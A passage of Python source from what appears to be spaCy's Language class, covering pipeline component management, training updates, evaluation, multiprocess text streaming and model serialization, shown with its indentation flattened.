from .pipeline import merge_noun_chunks, merge_entities, merge_subtokens
from .pipeline import EntityRuler
from .pipeline import Morphologizer
from .compat import izip, basestring_, is_python2
from .gold import GoldParse
from .scorer import Scorer
from ._ml import link_vectors_to_models, create_default_optimizer
from .attrs import IS_STOP, LANG
from .lang.punctuation import TOKENIZER_PREFIXES, TOKENIZER_SUFFIXES
from .lang.punctuation import TOKENIZER_INFIXES
from .lang.tokenizer_exceptions import TOKEN_MATCH
from .lang.tag_map import TAG_MAP
from .tokens import Doc
from .lang.lex_attrs import LEX_ATTRS, is_stop
from .errors import Errors, Warnings, deprecation_warning, user_warning
from . import util
from . import about
class BaseDefaults(object):
@classmethod
def create_lemmatizer(cls, nlp=None, lookups=None):
if lookups is None:
lookups = cls.create_lookups(nlp=nlp)
return Lemmatizer(lookups=lookups)
@classmethod
def create_lookups(cls, nlp=None):
root = util.get_module_path(cls)
filenames = {name: root / filename for name, filename in cls.resources}
if LANG in cls.lex_attr_getters:
lang = cls.lex_attr_getters[LANG](None)
user_lookups = util.get_entry_point(util.ENTRY_POINTS.lookups, lang, {})
filenames.update(user_lookups)
lookups = Lookups()
for name, filename in filenames.items():
data = util.load_language_data(filename)
lookups.add_table(name, data)
return lookups
@classmethod
def create_vocab(cls, nlp=None):
lookups = cls.create_lookups(nlp)
lemmatizer = cls.create_lemmatizer(nlp, lookups=lookups)
lex_attr_getters = dict(cls.lex_attr_getters)
# This is messy, but it's the minimal working fix to Issue #639.
lex_attr_getters[IS_STOP] = functools.partial(is_stop, stops=cls.stop_words)
vocab = Vocab(
lex_attr_getters=lex_attr_getters,
tag_map=cls.tag_map,
lemmatizer=lemmatizer,
lookups=lookups,
)
for tag_str, exc in cls.morph_rules.items():
for orth_str, attrs in exc.items():
vocab.morphology.add_special_case(tag_str, orth_str, attrs)
return vocab
@classmethod
def create_tokenizer(cls, nlp=None):
rules = cls.tokenizer_exceptions
token_match = cls.token_match
prefix_search = (
util.compile_prefix_regex(cls.prefixes).search if cls.prefixes else None
)
suffix_search = (
util.compile_suffix_regex(cls.suffixes).search if cls.suffixes else None
)
infix_finditer = (
util.compile_infix_regex(cls.infixes).finditer if cls.infixes else None
)
vocab = nlp.vocab if nlp is not None else cls.create_vocab(nlp)
return Tokenizer(
vocab,
rules=rules,
prefix_search=prefix_search,
suffix_search=suffix_search,
infix_finditer=infix_finditer,
token_match=token_match,
)
pipe_names = ["tagger", "parser", "ner"]
token_match = TOKEN_MATCH
prefixes = tuple(TOKENIZER_PREFIXES)
suffixes = tuple(TOKENIZER_SUFFIXES)
infixes = tuple(TOKENIZER_INFIXES)
tag_map = dict(TAG_MAP)
tokenizer_exceptions = {}
stop_words = set()
lemma_rules = {}
lemma_exc = {}
lemma_index = {}
lemma_lookup = {}
morph_rules = {}
lex_attr_getters = LEX_ATTRS
syntax_iterators = {}
resources = {}
writing_system = {"direction": "ltr", "has_case": True, "has_letters": True}
single_orth_variants = []
paired_orth_variants = []
class Language(object):
"""A text-processing pipeline. Usually you'll load this once per process,
and pass the instance around your application.
Defaults (class): Settings, data and factory methods for creating the `nlp`
object and processing pipeline.
lang (unicode): Two-letter language ID, i.e. ISO code.
DOCS: https://spacy.io/api/language
"""
Defaults = BaseDefaults
lang = None
factories = {
"tokenizer": lambda nlp: nlp.Defaults.create_tokenizer(nlp),
"tensorizer": lambda nlp, **cfg: Tensorizer(nlp.vocab, **cfg),
"tagger": lambda nlp, **cfg: Tagger(nlp.vocab, **cfg),
"morphologizer": lambda nlp, **cfg: Morphologizer(nlp.vocab, **cfg),
"parser": lambda nlp, **cfg: DependencyParser(nlp.vocab, **cfg),
"ner": lambda nlp, **cfg: EntityRecognizer(nlp.vocab, **cfg),
"entity_linker": lambda nlp, **cfg: EntityLinker(nlp.vocab, **cfg),
"similarity": lambda nlp, **cfg: SimilarityHook(nlp.vocab, **cfg),
"textcat": lambda nlp, **cfg: TextCategorizer(nlp.vocab, **cfg),
"sentencizer": lambda nlp, **cfg: Sentencizer(**cfg),
"merge_noun_chunks": lambda nlp, **cfg: merge_noun_chunks,
"merge_entities": lambda nlp, **cfg: merge_entities,
"merge_subtokens": lambda nlp, **cfg: merge_subtokens,
"entity_ruler": lambda nlp, **cfg: EntityRuler(nlp, **cfg),
}
def __init__(
self, vocab=True, make_doc=True, max_length=10 ** 6, meta={}, **kwargs
):
"""Initialise a Language object.
vocab (Vocab): A `Vocab` object. If `True`, a vocab is created via
`Language.Defaults.create_vocab`.
make_doc (callable): A function that takes text and returns a `Doc`
object. Usually a `Tokenizer`.
meta (dict): Custom meta data for the Language class. Is written to by
models to add model meta data.
max_length (int) :
Maximum number of characters in a single text. The current v2 models
may run out memory on extremely long texts, due to large internal
allocations. You should segment these texts into meaningful units,
e.g. paragraphs, subsections etc, before passing them to spaCy.
Default maximum length is 1,000,000 characters (1mb). As a rule of
thumb, if all pipeline components are enabled, spaCy's default
models currently requires roughly 1GB of temporary memory per
100,000 characters in one text.
RETURNS (Language): The newly constructed object.
"""
user_factories = util.get_entry_points(util.ENTRY_POINTS.factories)
self.factories.update(user_factories)
self._meta = dict(meta)
self._path = None
if vocab is True:
factory = self.Defaults.create_vocab
vocab = factory(self, **meta.get("vocab", {}))
if vocab.vectors.name is None:
vocab.vectors.name = meta.get("vectors", {}).get("name")
else:
if (self.lang and vocab.lang) and (self.lang != vocab.lang):
raise ValueError(Errors.E150.format(nlp=self.lang, vocab=vocab.lang))
self.vocab = vocab
if make_doc is True:
factory = self.Defaults.create_tokenizer
make_doc = factory(self, **meta.get("tokenizer", {}))
self.tokenizer = make_doc
self.pipeline = []
self.max_length = max_length
self._optimizer = None
@property
def path(self):
return self._path
@property
def meta(self):
if self.vocab.lang:
self._meta.setdefault("lang", self.vocab.lang)
else:
self._meta.setdefault("lang", self.lang)
self._meta.setdefault("name", "model")
self._meta.setdefault("version", "0.0.0")
self._meta.setdefault("spacy_version", ">={}".format(about.__version__))
self._meta.setdefault("description", "")
self._meta.setdefault("author", "")
self._meta.setdefault("email", "")
self._meta.setdefault("url", "")
self._meta.setdefault("license", "")
self._meta["vectors"] = {
"width": self.vocab.vectors_length,
"vectors": len(self.vocab.vectors),
"keys": self.vocab.vectors.n_keys,
"name": self.vocab.vectors.name,
}
self._meta["pipeline"] = self.pipe_names
self._meta["labels"] = self.pipe_labels
return self._meta
@meta.setter
def meta(self, value):
self._meta = value
# Conveniences to access pipeline components
# Shouldn't be used anymore!
@property
def tensorizer(self):
return self.get_pipe("tensorizer")
@property
def tagger(self):
return self.get_pipe("tagger")
@property
def parser(self):
return self.get_pipe("parser")
@property
def entity(self):
return self.get_pipe("ner")
@property
def linker(self):
return self.get_pipe("entity_linker")
@property
def matcher(self):
return self.get_pipe("matcher")
@property
def pipe_names(self):
"""Get names of available pipeline components.
RETURNS (list): List of component name strings, in order.
"""
return [pipe_name for pipe_name, _ in self.pipeline]
@property
def pipe_labels(self):
"""Get the labels set by the pipeline components, if available (if
the component exposes a labels property).
RETURNS (dict): Labels keyed by component name.
"""
labels = OrderedDict()
for name, pipe in self.pipeline:
if hasattr(pipe, "labels"):
labels[name] = list(pipe.labels)
return labels
def get_pipe(self, name):
"""Get a pipeline component for a given component name.
name (unicode): Name of pipeline component to get.
RETURNS (callable): The pipeline component.
DOCS: https://spacy.io/api/language#get_pipe
"""
for pipe_name, component in self.pipeline:
if pipe_name == name:
return component
raise KeyError(Errors.E001.format(name=name, opts=self.pipe_names))
def create_pipe(self, name, config=dict()):
"""Create a pipeline component from a factory.
name (unicode): Factory name to look up in `Language.factories`.
config (dict): Configuration parameters to initialise component.
RETURNS (callable): Pipeline component.
DOCS: https://spacy.io/api/language#create_pipe
"""
if name not in self.factories:
if name == "sbd":
raise KeyError(Errors.E108.format(name=name))
else:
raise KeyError(Errors.E002.format(name=name))
factory = self.factories[name]
return factory(self, **config)
def add_pipe(
self, component, name=None, before=None, after=None, first=None, last=None
):
"""Add a component to the processing pipeline. Valid components are
callables that take a `Doc` object, modify it and return it. Only one
of before/after/first/last can be set. Default behaviour is "last".
component (callable): The pipeline component.
name (unicode): Name of pipeline component. Overwrites existing
component.name attribute if available. If no name is set and
the component exposes no name attribute, component.__name__ is
used. An error is raised if a name already exists in the pipeline.
before (unicode): Component name to insert component directly before.
after (unicode): Component name to insert component directly after.
first (bool): Insert component first / not first in the pipeline.
last (bool): Insert component last / not last in the pipeline.
DOCS: https://spacy.io/api/language#add_pipe
"""
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E004.format(component=component)
raise ValueError(msg)
if name is None:
if hasattr(component, "name"):
name = component.name
elif hasattr(component, "__name__"):
name = component.__name__
elif hasattr(component, "__class__") and hasattr(
component.__class__, "__name__"
):
name = component.__class__.__name__
else:
name = repr(component)
if name in self.pipe_names:
raise ValueError(Errors.E007.format(name=name, opts=self.pipe_names))
if sum([bool(before), bool(after), bool(first), bool(last)]) >= 2:
raise ValueError(Errors.E006)
pipe = (name, component)
if last or not any([first, before, after]):
self.pipeline.append(pipe)
elif first:
self.pipeline.insert(0, pipe)
elif before and before in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(before), pipe)
elif after and after in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(after) + 1, pipe)
else:
raise ValueError(
Errors.E001.format(name=before or after, opts=self.pipe_names)
)
def has_pipe(self, name):
"""Check if a component name is present in the pipeline. Equivalent to
`name in nlp.pipe_names`.
name (unicode): Name of the component.
RETURNS (bool): Whether a component of the name exists in the pipeline.
DOCS: https://spacy.io/api/language#has_pipe
"""
return name in self.pipe_names
def replace_pipe(self, name, component):
"""Replace a component in the pipeline.
name (unicode): Name of the component to replace.
component (callable): Pipeline component.
DOCS: https://spacy.io/api/language#replace_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E135.format(name=name)
raise ValueError(msg)
self.pipeline[self.pipe_names.index(name)] = (name, component)
def rename_pipe(self, old_name, new_name):
"""Rename a pipeline component.
old_name (unicode): Name of the component to rename.
new_name (unicode): New name of the component.
DOCS: https://spacy.io/api/language#rename_pipe
"""
if old_name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=old_name, opts=self.pipe_names))
if new_name in self.pipe_names:
raise ValueError(Errors.E007.format(name=new_name, opts=self.pipe_names))
i = self.pipe_names.index(old_name)
self.pipeline[i] = (new_name, self.pipeline[i][1])
def remove_pipe(self, name):
"""Remove a component from the pipeline.
name (unicode): Name of the component to remove.
RETURNS (tuple): A `(name, component)` tuple of the removed component.
DOCS: https://spacy.io/api/language#remove_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
return self.pipeline.pop(self.pipe_names.index(name))
def __call__(self, text, disable=[], component_cfg=None):
"""Apply the pipeline to some text. The text can span multiple sentences,
and can contain arbtrary whitespace. Alignment into the original string
is preserved.
text (unicode): The text to be processed.
disable (list): Names of the pipeline components to disable.
component_cfg (dict): An optional dictionary with extra keyword arguments
for specific components.
RETURNS (Doc): A container for accessing the annotations.
DOCS: https://spacy.io/api/language#call
"""
if len(text) > self.max_length:
raise ValueError(
Errors.E088.format(length=len(text), max_length=self.max_length)
)
doc = self.make_doc(text)
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if name in disable:
continue
if not hasattr(proc, "__call__"):
raise ValueError(Errors.E003.format(component=type(proc), name=name))
doc = proc(doc, **component_cfg.get(name, {}))
if doc is None:
raise ValueError(Errors.E005.format(name=name))
return doc
def disable_pipes(self, *names):
"""Disable one or more pipeline components. If used as a context
manager, the pipeline will be restored to the initial state at the end
of the block. Otherwise, a DisabledPipes object is returned, that has
a `.restore()` method you can use to undo your changes.
DOCS: https://spacy.io/api/language#disable_pipes
"""
return DisabledPipes(self, *names)
def make_doc(self, text):
return self.tokenizer(text)
def _format_docs_and_golds(self, docs, golds):
"""Format golds and docs before update models."""
expected_keys = ("words", "tags", "heads", "deps", "entities", "cats", "links")
gold_objs = []
doc_objs = []
for doc, gold in zip(docs, golds):
if isinstance(doc, basestring_):
doc = self.make_doc(doc)
if not isinstance(gold, GoldParse):
unexpected = [k for k in gold if k not in expected_keys]
if unexpected:
err = Errors.E151.format(unexp=unexpected, exp=expected_keys)
raise ValueError(err)
gold = GoldParse(doc, **gold)
doc_objs.append(doc)
gold_objs.append(gold)
return doc_objs, gold_objs
def update(self, docs, golds, drop=0.0, sgd=None, losses=None, component_cfg=None):
"""Update the models in the pipeline.
docs (iterable): A batch of `Doc` objects.
golds (iterable): A batch of `GoldParse` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
losses (dict): Dictionary to update with the loss, keyed by component.
component_cfg (dict): Config parameters for specific pipeline
components, keyed by component name.
DOCS: https://spacy.io/api/language#update
"""
if len(docs) != len(golds):
raise IndexError(Errors.E009.format(n_docs=len(docs), n_golds=len(golds)))
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
# Allow dict of args to GoldParse, instead of GoldParse objects.
docs, golds = self._format_docs_and_golds(docs, golds)
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
pipes = list(self.pipeline)
random.shuffle(pipes)
if component_cfg is None:
component_cfg = {}
for name, proc in pipes:
if not hasattr(proc, "update"):
continue
grads = {}
kwargs = component_cfg.get(name, {})
kwargs.setdefault("drop", drop)
proc.update(docs, golds, sgd=get_grads, losses=losses, **kwargs)
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
def rehearse(self, docs, sgd=None, losses=None, config=None):
"""Make a "rehearsal" update to the models in the pipeline, to prevent
forgetting. Rehearsal updates run an initial copy of the model over some
data, and update the model so its current predictions are more like the
initial ones. This is useful for keeping a pretrained model on-track,
even if you're updating it with a smaller set of examples.
docs (iterable): A batch of `Doc` objects.
drop (float): The dropout rate.
sgd (callable): An optimizer.
RETURNS (dict): Results from the update.
EXAMPLE:
>>> raw_text_batches = minibatch(raw_texts)
>>> for labelled_batch in minibatch(zip(train_docs, train_golds)):
>>> docs, golds = zip(*train_docs)
>>> nlp.update(docs, golds)
>>> raw_batch = [nlp.make_doc(text) for text in next(raw_text_batches)]
>>> nlp.rehearse(raw_batch)
"""
# TODO: document
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
docs = list(docs)
for i, doc in enumerate(docs):
if isinstance(doc, basestring_):
docs[i] = self.make_doc(doc)
pipes = list(self.pipeline)
random.shuffle(pipes)
if config is None:
config = {}
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
for name, proc in pipes:
if not hasattr(proc, "rehearse"):
continue
grads = {}
proc.rehearse(docs, sgd=get_grads, losses=losses, **config.get(name, {}))
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
return losses
def preprocess_gold(self, docs_golds):
"""Can be called before training to pre-process gold data. By default,
it handles nonprojectivity and adds missing tags to the tag map.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
YIELDS (tuple): Tuples of preprocessed `Doc` and `GoldParse` objects.
"""
for name, proc in self.pipeline:
if hasattr(proc, "preprocess_gold"):
docs_golds = proc.preprocess_gold(docs_golds)
for doc, gold in docs_golds:
yield doc, gold
def begin_training(self, get_gold_tuples=None, sgd=None, component_cfg=None, **cfg):
"""Allocate models, pre-process training data and acquire a trainer and
optimizer. Used as a contextmanager.
get_gold_tuples (function): Function returning gold data
component_cfg (dict): Config parameters for specific components.
**cfg: Config parameters.
RETURNS: An optimizer.
DOCS: https://spacy.io/api/language#begin_training
"""
if get_gold_tuples is None:
get_gold_tuples = lambda: []
# Populate vocab
else:
for _, annots_brackets in get_gold_tuples():
_ = annots_brackets.pop()
for annots, _ in annots_brackets:
for word in annots[1]:
_ = self.vocab[word] # noqa: F841
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if hasattr(proc, "begin_training"):
kwargs = component_cfg.get(name, {})
kwargs.update(cfg)
proc.begin_training(
get_gold_tuples,
pipeline=self.pipeline,
sgd=self._optimizer,
**kwargs
)
return self._optimizer
def resume_training(self, sgd=None, **cfg):
"""Continue training a pretrained model.
Create and return an optimizer, and initialize "rehearsal" for any pipeline
component that has a .rehearse() method. Rehearsal is used to prevent
models from "forgetting" their initialised "knowledge". To perform
rehearsal, collect samples of text you want the models to retain performance
on, and call nlp.rehearse() with a batch of Doc objects.
"""
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
for name, proc in self.pipeline:
if hasattr(proc, "_rehearsal_model"):
proc._rehearsal_model = deepcopy(proc.model)
return self._optimizer
def evaluate(
self, docs_golds, verbose=False, batch_size=256, scorer=None, component_cfg=None
):
"""Evaluate a model's pipeline components.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
verbose (bool): Print debugging information.
batch_size (int): Batch size to use.
scorer (Scorer): Optional `Scorer` to use. If not passed in, a new one
will be created.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
RETURNS (Scorer): The scorer containing the evaluation results.
DOCS: https://spacy.io/api/language#evaluate
"""
if scorer is None:
scorer = Scorer(pipeline=self.pipeline)
if component_cfg is None:
component_cfg = {}
docs, golds = zip(*docs_golds)
docs = [
self.make_doc(doc) if isinstance(doc, basestring_) else doc for doc in docs
]
golds = list(golds)
for name, pipe in self.pipeline:
kwargs = component_cfg.get(name, {})
kwargs.setdefault("batch_size", batch_size)
if not hasattr(pipe, "pipe"):
docs = _pipe(pipe, docs, kwargs)
else:
docs = pipe.pipe(docs, **kwargs)
for doc, gold in zip(docs, golds):
if not isinstance(gold, GoldParse):
gold = GoldParse(doc, **gold)
if verbose:
print(doc)
kwargs = component_cfg.get("scorer", {})
kwargs.setdefault("verbose", verbose)
scorer.score(doc, gold, **kwargs)
return scorer
@contextmanager
def use_params(self, params, **cfg):
"""Replace weights of models in the pipeline with those provided in the
params dictionary. Can be used as a contextmanager, in which case,
models go back to their original weights after the block.
params (dict): A dictionary of parameters keyed by model ID.
**cfg: Config parameters.
EXAMPLE:
>>> with nlp.use_params(optimizer.averages):
>>> nlp.to_disk('/tmp/checkpoint')
"""
contexts = [
pipe.use_params(params)
for name, pipe in self.pipeline
if hasattr(pipe, "use_params")
]
# TODO: Having trouble with contextlib
# Workaround: these aren't actually context managers atm.
for context in contexts:
try:
next(context)
except StopIteration:
pass
yield
for context in contexts:
try:
next(context)
except StopIteration:
pass
def pipe(
self,
texts,
as_tuples=False,
n_threads=-1,
batch_size=1000,
disable=[],
cleanup=False,
component_cfg=None,
n_process=1,
):
"""Process texts as a stream, and yield `Doc` objects in order.
texts (iterator): A sequence of texts to process.
as_tuples (bool): If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples. Defaults to False.
batch_size (int): The number of texts to buffer.
disable (list): Names of the pipeline components to disable.
cleanup (bool): If True, unneeded strings are freed to control memory
use. Experimental.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
n_process (int): Number of processors to process texts, only supported
in Python3. If -1, set `multiprocessing.cpu_count()`.
YIELDS (Doc): Documents in the order of the original text.
DOCS: https://spacy.io/api/language#pipe
"""
# raw_texts will be used later to stop iterator.
texts, raw_texts = itertools.tee(texts)
if is_python2 and n_process != 1:
user_warning(Warnings.W023)
n_process = 1
if n_threads != -1:
deprecation_warning(Warnings.W016)
if n_process == -1:
n_process = mp.cpu_count()
if as_tuples:
text_context1, text_context2 = itertools.tee(texts)
texts = (tc[0] for tc in text_context1)
contexts = (tc[1] for tc in text_context2)
docs = self.pipe(
texts,
batch_size=batch_size,
disable=disable,
component_cfg=component_cfg,
)
for doc, context in izip(docs, contexts):
yield (doc, context)
return
if component_cfg is None:
component_cfg = {}
pipes = (
[]
) # contains functools.partial objects so that easily create multiprocess worker.
for name, proc in self.pipeline:
if name in disable:
continue
kwargs = component_cfg.get(name, {})
# Allow component_cfg to overwrite the top-level kwargs.
kwargs.setdefault("batch_size", batch_size)
if hasattr(proc, "pipe"):
f = functools.partial(proc.pipe, **kwargs)
else:
# Apply the function, but yield the doc
f = functools.partial(_pipe, proc=proc, kwargs=kwargs)
pipes.append(f)
if n_process != 1:
docs = self._multiprocessing_pipe(texts, pipes, n_process, batch_size)
else:
# if n_process == 1, no processes are forked.
docs = (self.make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Track weakrefs of "recent" documents, so that we can see when they
# expire from memory. When they do, we know we don't need old strings.
# This way, we avoid maintaining an unbounded growth in string entries
# in the string store.
recent_refs = weakref.WeakSet()
old_refs = weakref.WeakSet()
# Keep track of the original string data, so that if we flush old strings,
# we can recover the original ones. However, we only want to do this if we're
# really adding strings, to save up-front costs.
original_strings_data = None
nr_seen = 0
for doc in docs:
yield doc
if cleanup:
recent_refs.add(doc)
if nr_seen < 10000:
old_refs.add(doc)
nr_seen += 1
elif len(old_refs) == 0:
old_refs, recent_refs = recent_refs, old_refs
if original_strings_data is None:
original_strings_data = list(self.vocab.strings)
else:
keys, strings = self.vocab.strings._cleanup_stale_strings(
original_strings_data
)
self.vocab._reset_cache(keys, strings)
self.tokenizer._reset_cache(keys)
nr_seen = 0
def _multiprocessing_pipe(self, texts, pipes, n_process, batch_size):
# raw_texts is used later to stop iteration.
texts, raw_texts = itertools.tee(texts)
# for sending texts to worker
texts_q = [mp.Queue() for _ in range(n_process)]
# for receiving byte encoded docs from worker
bytedocs_recv_ch, bytedocs_send_ch = zip(
*[mp.Pipe(False) for _ in range(n_process)]
)
batch_texts = minibatch(texts, batch_size)
# Sender sends texts to the workers.
# This is necessary to properly handle infinite length of texts.
# (In this case, all data cannot be sent to the workers at once)
sender = _Sender(batch_texts, texts_q, chunk_size=n_process)
# send twice so that make process busy
sender.send()
sender.send()
procs = [
mp.Process(target=_apply_pipes, args=(self.make_doc, pipes, rch, sch))
for rch, sch in zip(texts_q, bytedocs_send_ch)
]
for proc in procs:
proc.start()
# Cycle channels not to break the order of docs.
# The received object is batch of byte encoded docs, so flatten them with chain.from_iterable.
byte_docs = chain.from_iterable(recv.recv() for recv in cycle(bytedocs_recv_ch))
docs = (Doc(self.vocab).from_bytes(byte_doc) for byte_doc in byte_docs)
try:
for i, (_, doc) in enumerate(zip(raw_texts, docs), 1):
yield doc
if i % batch_size == 0:
# tell `sender` that one batch was consumed.
sender.step()
finally:
for proc in procs:
proc.terminate()
def to_disk(self, path, exclude=tuple(), disable=None):
"""Save the current state to a directory. If a model is loaded, this
will include the model.
path (unicode or Path): Path to a directory, which will be created if
it doesn't exist.
exclude (list): Names of components or serialization fields to exclude.
DOCS: https://spacy.io/api/language#to_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
serializers = OrderedDict()
serializers["tokenizer"] = lambda p: self.tokenizer.to_disk(
p, exclude=["vocab"]
)
serializers["meta.json"] = lambda p: p.open("w").write(
srsly.json_dumps(self.meta)
)
for name, proc in self.pipeline:
if not hasattr(proc, "name"):
continue
if name in exclude:
continue
if not hasattr(proc, "to_disk"):
continue
serializers[name] = lambda p, proc=proc: proc.to_disk(p, exclude=["vocab"])
serializers["vocab"] = lambda p: self.vocab.to_disk(p)
util.to_disk(path, serializers, exclude)
def from_disk(self, path, exclude=tuple(), disable=None):
"""Loads state from a directory. Modifies the object in place and
returns it. If the saved `Language` object contains a model, the
model will be loaded.
path (unicode or Path): A path to a directory.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The modified `Language` object.
DOCS: https://spacy.io/api/language#from_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
deserializers = OrderedDict()
deserializers["meta.json"] = lambda p: self.meta.update(srsly.read_json(p))
deserializers["vocab"] = lambda p: self.vocab.from_disk(
p
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda p: self.tokenizer.from_disk(
p, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_disk"):
continue
deserializers[name] = lambda p, proc=proc: proc.from_disk(
p, exclude=["vocab"]
)
if not (path / "vocab").exists() and "vocab" not in exclude:
# Convert to list here in case exclude is (default) tuple
exclude = list(exclude) + ["vocab"]
util.from_disk(path, deserializers, exclude)
self._path = path
return self
def to_bytes(self, exclude=tuple(), disable=None, **kwargs):
"""Serialize the current state to a binary string.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (bytes): The serialized form of the `Language` object.
DOCS: https://spacy.io/api/language#to_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
serializers = OrderedDict()
serializers["vocab"] = lambda: self.vocab.to_bytes()
serializers["tokenizer"] = lambda: self.tokenizer.to_bytes(exclude=["vocab"])
serializers["meta.json"] = lambda: srsly.json_dumps(self.meta)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "to_bytes"):
continue
serializers[name] = lambda proc=proc: proc.to_bytes(exclude=["vocab"])
exclude = util.get_serialization_exclude(serializers, exclude, kwargs)
return util.to_bytes(serializers, exclude)
def from_bytes(self, bytes_data, exclude=tuple(), disable=None, **kwargs):
"""Load state from a binary string.
bytes_data (bytes): The data to load from.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The `Language` object.
DOCS: https://spacy.io/api/language#from_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
deserializers = OrderedDict()
deserializers["meta.json"] = lambda b: self.meta.update(srsly.json_loads(b))
deserializers["vocab"] = lambda b: self.vocab.from_bytes(
b
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda b: self.tokenizer.from_bytes(
b, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_bytes"):
continue
deserializers[name] = lambda b, proc=proc: proc.from_bytes(
b, exclude=["vocab"]
)
exclude = util.get_serialization_exclude(deserializers, exclude, kwargs)
util.from_bytes(bytes_data, deserializers, exclude)
return self
def _fix_pretrained_vectors_name(nlp):
# TODO: Replace this once we handle vectors consistently as static
# data
if "vectors" in nlp.meta and nlp.meta["vectors"].get("name"):
nlp.vocab.vectors.name = nlp.meta["vectors"]["name"]
elif not nlp.vocab.vectors.size:
nlp.vocab.vectors.name = None
elif "name" in nlp.meta and "lang" in nlp.meta:
vectors_name = "%s_%s.vectors" % (nlp.meta["lang"], nlp.meta["name"])
nlp.vocab.vectors.name = vectors_name
else:
raise ValueError(Errors.E092)
if nlp.vocab.vectors.size != 0:
link_vectors_to_models(nlp.vocab)
for name, proc in nlp.pipeline:
if not hasattr(proc, "cfg"):
continue
proc.cfg.setdefault("deprecation_fixes", {})
proc.cfg["deprecation_fixes"]["vectors_name"] = nlp.vocab.vectors.name
class DisabledPipes(list):
"""Manager for temporary pipeline disabling."""
def __init__(self, nlp, *names):
self.nlp = nlp
self.names = names
# Important! Not deep copy -- we just want the container (but we also
# want to support people providing arbitrarily typed nlp.pipeline
# objects.)
self.original_pipeline = copy(nlp.pipeline)
list.__init__(self)
self.extend(nlp.remove_pipe(name) for name in names)
def __enter__(self):
return self
def __exit__(self, *args):
self.restore()
def restore(self):
"""Restore the pipeline to its state when DisabledPipes was created."""
current, self.nlp.pipeline = self.nlp.pipeline, self.original_pipeline
unexpected = [name for name, pipe in current if not self.nlp.has_pipe(name)]
if unexpected:
# Don't change the pipeline if we're raising an error.
self.nlp.pipeline = current
raise ValueError(Errors.E008.format(names=unexpected))
self[:] = []
def _pipe(docs, proc, kwargs):
# We added some args for pipe that __call__ doesn't expect.
kwargs = dict(kwargs)
for arg in ["n_threads", "batch_size"]:
if arg in kwargs:
kwargs.pop(arg)
for doc in docs:
doc = proc(doc, **kwargs)
yield doc
def _apply_pipes(make_doc, pipes, reciever, sender):
"""Worker for Language.pipe
receiver (multiprocessing.Connection): Pipe to receive text. Usually
created by `multiprocessing.Pipe()`
sender (multiprocessing.Connection): Pipe to send doc. Usually created by
`multiprocessing.Pipe()`
"""
while True:
texts = reciever.get()
docs = (make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Connection does not accept unpickable objects, so send list.
sender.send([doc.to_bytes() for doc in docs])
class _Sender:
"""Util for sending data to multiprocessing workers in Language.pipe"""
def __init__(self, data, queues, chunk_size):
self.data = iter(data)
self.queues = iter(cycle(queues))
self.chunk_size = chunk_size
self.count = 0
def send(self):
"""Send chunk_size items from self.data to channels."""
for item, q in itertools.islice(
zip(self.data, cycle(self.queues)), self.chunk_size
):
# cycle channels so that distribute the texts evenly
q.put(item)
def step(self):
"""Tell sender that comsumed one item.
